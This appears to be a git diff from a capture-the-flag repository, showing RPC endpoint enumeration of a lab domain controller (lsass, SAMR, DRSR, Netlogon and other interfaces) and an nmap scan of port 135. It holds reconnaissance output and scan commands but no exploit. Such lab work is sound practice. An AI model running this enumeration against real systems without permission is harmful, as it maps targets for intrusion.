UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name
Bindings:
ncalrpc:[LRPC-78c65697da0c3cb9e7]
ncalrpc:[LRPC-5d1d91fbc9832f3673]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-7f9f9d7e564fa27a15]
ncalrpc:[senssvc]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
ncalrpc:[LRPC-2d7a6fcd1e6a5d90b0]
ncalrpc:[OLE59700168EED37EDF88950A0917DC]
Protocol: N/A
Provider: nsisvc.dll
UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings:
ncalrpc:[LRPC-9ec11ee764d799175d]
Protocol: N/A
Provider: nrpsrv.dll
UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings:
ncalrpc:[LRPC-99bbae991f0f6e961a]
Protocol: N/A
Provider: N/A
UUID : E40F7B57-7A25-4CD3-A135-7F7D3DF9D16B v1.0 Network Connection Broker server endpoint
Bindings:
ncalrpc:[LRPC-95313533ddc887d499]
ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4]
ncalrpc:[LRPC-4f7c4b35ddfa33800c]
ncalrpc:[LRPC-9e83194e1e5674c55f]
Protocol: N/A
Provider: N/A
UUID : 880FD55E-43B9-11E0-B1A8-CF4EDFD72085 v1.0 KAPI Service endpoint
Bindings:
ncalrpc:[LRPC-95313533ddc887d499]
ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4]
ncalrpc:[LRPC-4f7c4b35ddfa33800c]
ncalrpc:[LRPC-9e83194e1e5674c55f]
Protocol: N/A
Provider: N/A
UUID : 5222821F-D5E2-4885-84F1-5F6185A0EC41 v1.0 Network Connection Broker server endpoint for NCB Reset module
Bindings:
ncalrpc:[LRPC-4f7c4b35ddfa33800c]
ncalrpc:[LRPC-9e83194e1e5674c55f]
Protocol: N/A
Provider: N/A
UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0
Bindings:
ncalrpc:[LRPC-7d4055d4f64c73ef42]
ncalrpc:[LRPC-a91e72435259adddfa]
Protocol: N/A
Provider: dhcpcsvc.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc]
ncalrpc:[dhcpcsvc6]
Protocol: N/A
Provider: dhcpcsvc6.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc6]
Protocol: [MS-EVEN6]: EventLog Remoting Protocol
Provider: wevtsvc.dll
UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings:
ncacn_ip_tcp:10.129.243.131[49665]
ncacn_np:\\DC[\pipe\eventlog]
ncalrpc:[eventlog]
Protocol: N/A
Provider: gpsvc.dll
UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface
Bindings:
ncalrpc:[LRPC-1e815b36ff28d761c1]
Protocol: N/A
Provider: N/A
UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0
Bindings:
ncacn_ip_tcp:10.129.243.131[49666]
ncalrpc:[LRPC-3e1dbf52587c9cea33]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
ncacn_ip_tcp:10.129.243.131[49666]
ncalrpc:[LRPC-3e1dbf52587c9cea33]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2]
Protocol: N/A
Provider: N/A
UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0
Bindings:
ncalrpc:[LRPC-3e1dbf52587c9cea33]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0
Bindings:
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0
Bindings:
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2]
Protocol: N/A
Provider: schedsvc.dll
UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0
Bindings:
ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2]
Protocol: N/A
Provider: MPSSVC.dll
UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-a3db541015ee3b4092]
ncalrpc:[LRPC-25295713f276d13d17]
ncalrpc:[LRPC-61500542b0c0f189c2]
ncalrpc:[LRPC-3a5ad18195f7896668]
Protocol: N/A
Provider: N/A
UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-25295713f276d13d17]
ncalrpc:[LRPC-61500542b0c0f189c2]
ncalrpc:[LRPC-3a5ad18195f7896668]
Protocol: N/A
Provider: MPSSVC.dll
UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-61500542b0c0f189c2]
ncalrpc:[LRPC-3a5ad18195f7896668]
Protocol: N/A
Provider: BFE.DLL
UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings:
ncalrpc:[LRPC-3a5ad18195f7896668]
Protocol: N/A
Provider: N/A
UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings:
ncacn_np:\\DC[\PIPE\wkssvc]
ncalrpc:[LRPC-0a9c64a79e96914cf8]
Protocol: N/A
Provider: N/A
UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface
Bindings:
ncalrpc:[LRPC-0a9c64a79e96914cf8]
Protocol: N/A
Provider: N/A
UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server
Bindings:
ncalrpc:[LRPC-0a9c64a79e96914cf8]
Protocol: N/A
Provider: N/A
UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0
Bindings:
ncalrpc:[LRPC-eeed9c661ca2875f9a]
ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF]
Protocol: N/A
Provider: N/A
UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0
Bindings:
ncalrpc:[LRPC-eeed9c661ca2875f9a]
ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF]
Protocol: N/A
Provider: N/A
UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0
Bindings:
ncalrpc:[LRPC-eeed9c661ca2875f9a]
ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF]
Protocol: N/A
Provider: N/A
UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0
Bindings:
ncalrpc:[LRPC-eeed9c661ca2875f9a]
ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF]
Protocol: N/A
Provider: N/A
UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0
Bindings:
ncalrpc:[LRPC-eeed9c661ca2875f9a]
ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF]
Protocol: N/A
Provider: N/A
UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0
Bindings:
ncalrpc:[LRPC-eeed9c661ca2875f9a]
ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF]
Protocol: N/A
Provider: N/A
UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs
Bindings:
ncalrpc:[OLE5FCB0823110EF79154A84BC1C955]
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-2b9dd75a050dd32327]
Protocol: N/A
Provider: N/A
UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint
Bindings:
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-2b9dd75a050dd32327]
Protocol: N/A
Provider: N/A
UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint
Bindings:
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-2b9dd75a050dd32327]
Protocol: N/A
Provider: iphlpsvc.dll
UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings:
ncalrpc:[LRPC-2b9dd75a050dd32327]
Protocol: N/A
Provider: N/A
UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli
Bindings:
ncalrpc:[LRPC-0f23b80e8c8e8083c8]
ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE]
Protocol: N/A
Provider: N/A
UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli
Bindings:
ncalrpc:[LRPC-0f23b80e8c8e8083c8]
ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE]
Protocol: N/A
Provider: N/A
UUID : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service
Bindings:
ncalrpc:[NETLOGON_LRPC]
ncacn_np:\\DC[\pipe\f646315b4c642943]
ncacn_http:10.129.243.131[49674]
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
Protocol: N/A
Provider: N/A
UUID : 8FB74744-B2FF-4C00-BE0D-9EF9A191FE1B v1.0 Ngc Pop Key Service
Bindings:
ncalrpc:[NETLOGON_LRPC]
ncacn_np:\\DC[\pipe\f646315b4c642943]
ncacn_http:10.129.243.131[49674]
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
Protocol: N/A
Provider: N/A
UUID : B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86 v2.0 KeyIso
Bindings:
ncalrpc:[NETLOGON_LRPC]
ncacn_np:\\DC[\pipe\f646315b4c642943]
ncacn_http:10.129.243.131[49674]
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
Protocol: [MS-NRPC]: Netlogon Remote Protocol
Provider: netlogon.dll
UUID : 12345678-1234-ABCD-EF00-01234567CFFB v1.0
Bindings:
ncalrpc:[NETLOGON_LRPC]
ncacn_np:\\DC[\pipe\f646315b4c642943]
ncacn_http:10.129.243.131[49674]
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
Protocol: [MS-RAA]: Remote Authorization API Protocol
Provider: N/A
UUID : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck
Bindings:
ncalrpc:[NETLOGON_LRPC]
ncacn_np:\\DC[\pipe\f646315b4c642943]
ncacn_http:10.129.243.131[49674]
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
ncalrpc:[NETLOGON_LRPC]
ncacn_np:\\DC[\pipe\f646315b4c642943]
ncacn_http:10.129.243.131[49674]
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote
Provider: lsasrv.dll
UUID : 12345778-1234-ABCD-EF00-0123456789AB v0.0
Bindings:
ncacn_np:\\DC[\pipe\f646315b4c642943]
ncacn_http:10.129.243.131[49674]
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol
Provider: ntdsai.dll
UUID : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface
Bindings:
ncacn_np:\\DC[\pipe\f646315b4c642943]
ncacn_http:10.129.243.131[49674]
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol
Provider: samsrv.dll
UUID : 12345778-1234-ABCD-EF00-0123456789AC v1.0
Bindings:
ncacn_ip_tcp:10.129.243.131[49673]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091]
ncacn_ip_tcp:10.129.243.131[49667]
ncalrpc:[samss lpc]
ncalrpc:[SidKey Local End Point]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSA_EAS_ENDPOINT]
ncalrpc:[lsacap]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncacn_np:\\DC[\pipe\lsass]
Protocol: N/A
Provider: N/A
UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service
Bindings:
ncalrpc:[LRPC-f4293e3b5b9ae5cb28]
Protocol: N/A
Provider: srvsvc.dll
UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings:
ncalrpc:[LRPC-f4293e3b5b9ae5cb28]
Protocol: N/A
Provider: sysmain.dll
UUID : B58AA02E-2884-4E97-8176-4EE06D794184 v1.0
Bindings:
ncalrpc:[LRPC-6ba6be7619ad5499b5]
Protocol: N/A
Provider: N/A
UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server
Bindings:
ncalrpc:[LRPC-e9c9cb51676dd7958e]
Protocol: N/A
Provider: IKEEXT.DLL
UUID : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API
Bindings:
ncalrpc:[LRPC-a6cbf0f8554ac2dd0e]
Protocol: N/A
Provider: N/A
UUID : 650A7E26-EAB8-5533-CE43-9C1DFCE11511 v1.0 Vpn APIs
Bindings:
ncalrpc:[LRPC-78511121f1275f430c]
ncalrpc:[VpnikeRpc]
ncalrpc:[RasmanLrpc]
ncacn_np:\\DC[\PIPE\ROUTER]
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
ncacn_ip_tcp:10.129.243.131[49678]
Protocol: [MS-CMPO]: MSDTC Connection Manager:
Provider: msdtcprx.dll
UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0
Bindings:
ncalrpc:[LRPC-3bcaafee1590c0de20]
ncalrpc:[OLE17B51056E4D45A611212712C1451]
ncalrpc:[LRPC-9c5b8ea96b2f264739]
ncalrpc:[LRPC-9c5b8ea96b2f264739]
ncalrpc:[LRPC-9c5b8ea96b2f264739]
Protocol: N/A
Provider: N/A
UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0
Bindings:
ncalrpc:[LRPC-802031e034c1f025bd]
Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management
Provider: dns.exe
UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0
Bindings:
ncacn_ip_tcp:10.129.243.131[49695]
Protocol: [MS-FRS2]: Distributed File System Replication Protocol
Provider: dfsrmig.exe
UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings:
ncacn_ip_tcp:10.129.243.131[49843]
ncalrpc:[OLECF74F747061ABA28294F2BDC6FF0]
Protocol: N/A
Provider: N/A
UUID : BF4DC912-E52F-4904-8EBE-9317C1BDD497 v1.0
Bindings:
ncalrpc:[LRPC-92939372b55364a6c8]
ncalrpc:[OLE9D9AB6AB4D22AD38C10DD1548060]
[*] Received 405 endpoints.

36
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml Normal file
View File

@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 135 -&#45;script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 135 -&#45;script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131" start="1698496073" startstr="Sat Oct 28 14:27:53 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="135"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1698496076"/>
<taskend task="NSE" time="1698496076"/>
<taskbegin task="NSE" time="1698496076"/>
<taskend task="NSE" time="1698496076"/>
<taskbegin task="SYN Stealth Scan" time="1698496076"/>
<taskend task="SYN Stealth Scan" time="1698496078" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1698496078"/>
<taskend task="Service scan" time="1698496084" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1698496084"/>
<taskend task="NSE" time="1698496099"/>
<taskbegin task="NSE" time="1698496099"/>
<taskend task="NSE" time="1698496099"/>
<host starttime="1698496076" endtime="1698496099"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.243.131" addrtype="ipv4"/>
<hostnames>
<hostname name="megacorp.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" product="Microsoft Windows RPC" ostype="Windows" method="probed" conf="10"><cpe>cpe:/o:microsoft:windows</cpe></service></port>
</ports>
<times srtt="624808" rttvar="624808" to="1250000"/>
</host>
<taskbegin task="NSE" time="1698496099"/>
<taskend task="NSE" time="1698496099"/>
<taskbegin task="NSE" time="1698496099"/>
<taskend task="NSE" time="1698496099"/>
<runstats><finished time="1698496099" timestr="Sat Oct 28 14:28:19 2023" summary="Nmap done at Sat Oct 28 14:28:19 2023; 1 IP address (1 host up) scanned in 26.49 seconds" elapsed="26.49" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

Some files were not shown because too many files have changed in this diff Show More